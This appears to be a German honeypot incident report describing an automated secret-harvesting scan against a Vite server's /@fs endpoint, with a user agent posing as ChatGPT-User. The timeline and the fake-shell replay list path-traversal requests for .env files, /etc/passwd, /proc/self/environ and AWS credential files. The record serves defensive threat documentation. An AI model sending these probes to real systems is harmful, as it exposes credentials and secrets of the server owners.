ALLSmartSecurity
Angriffsfall

Vite /@fs Dateileck-Scanner (Secrets, LFI, SQLi, cmdi)

10.08.2026 · Credential/Secret-Harvester · 594 Anfragen · Dauer 16 s · Vereinigte Staaten

Überblick

Klassifizierung
Credential/Secret-Harvester
Angriffsmuster
Config-/Secret-Leak, Path-Traversal, Shell-/RCE-Probe, KI-/API-Probe, PHP-Scan, Admin-Login-Suche, SQL-Injection, Command-Injection, Framework-Probe
Herkunft
Vereinigte Staaten · Google LLC
Werkzeug (User-Agent)
Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot

594 Anfragen in 16 s von [IP], User-Agent Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot. Signaturen: CVE-2017-9841, CGI/Shellshock, Secret-Harvest.

Erkannte Signaturen

Nachgeladener Schadcode (entschärft)

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~
root@srv01:~$ GET /
root@srv01:~$ GET /@fs/src/.env?raw??
root@srv01:~$ GET /@fs/etc/passwd?raw??
root@srv01:~$ GET /@fs/app/.env?raw??
root@srv01:~$ GET /@fs/.env?raw??
root@srv01:~$ GET /@fs/proc/self/environ?raw??
root@srv01:~$ GET /@fs/root/.env?raw??
root@srv01:~$ GET /@fs/.env.development?raw??
root@srv01:~$ GET /@fs/root/rootkey.csv?raw??
root@srv01:~$ GET /@fs/..%2f..%2f..%2f..%2f..%2froot/.env?raw??
root@srv01:~$ GET /@fs/../../.env?raw??
root@srv01:~$ GET /@fs/app/rootkey.csv?raw??
root@srv01:~$ GET /@fs/.env.production?raw??
root@srv01:~$ GET /@fs/..%2f..%2f..%2f..%2f..%2fapp/.env?raw??
root@srv01:~$ GET /@fs/..%2f..%2f..%2f..%2f..%2fproc/self/environ?raw??
root@srv01:~$ GET /@fs/../.env?raw??
root@srv01:~$ GET /@fs/.env.local?raw??
root@srv01:~$ GET /@fs/.env.staging?raw??
root@srv01:~$ GET /@fs/root/.aws/credentials?raw??
root@srv01:~$ GET /@fs/root/.aws/config?raw??

Ablauf

(25 von 594, Wiederholungen zusammengefasst)
ZeitMethodePfad / PayloadMuster
+0 sGET/
+0 sGET/@fs/src/.env?raw??Config-/Secret-Leak
+0 sGET/@fs/etc/passwd?raw??Path-Traversal
+0 sGET/@fs/app/.env?raw??Config-/Secret-Leak
+0 sGET/@fs/.env?raw??Config-/Secret-Leak
+0 sGET/@fs/proc/self/environ?raw??
+0 sGET/@fs/root/.env?raw??Config-/Secret-Leak
+0 sGET/@fs/.env.development?raw??Config-/Secret-Leak
+0 sGET/@fs/root/rootkey.csv?raw??
+0 sGET/@fs/..%2f..%2f..%2f..%2f..%2froot/.env?raw??Path-Traversal
+0 sGET/@fs/../../.env?raw??Path-Traversal
+0 sGET/@fs/app/rootkey.csv?raw??
+0 sGET/@fs/.env.production?raw??Config-/Secret-Leak
+0 sGET/@fs/..%2f..%2f..%2f..%2f..%2fapp/.env?raw??Path-Traversal
+0 sGET/@fs/..%2f..%2f..%2f..%2f..%2fproc/self/environ?raw??Path-Traversal
+0 sGET/@fs/../.env?raw??Path-Traversal
+1 sGET/@fs/.env.local?raw??Config-/Secret-Leak
+1 sGET/@fs/.env.staging?raw??Config-/Secret-Leak
+1 sGET/@fs/root/.aws/credentials?raw??Config-/Secret-Leak
+1 sGET/@fs/root/.aws/config?raw??Config-/Secret-Leak
+1 sGET/@fs/root/.aws/credentials.backup?raw??Config-/Secret-Leak
+1 sGET/@fs/root/.aws/credentials.bak?raw??Config-/Secret-Leak
+1 sGET/@fs/home/node/.aws/credentials?raw??Config-/Secret-Leak
+1 sGET/@fs/home/node/.aws/config?raw??Config-/Secret-Leak
+1 sGET/@fs/home/ubuntu/.aws/credentials?raw??Config-/Secret-Leak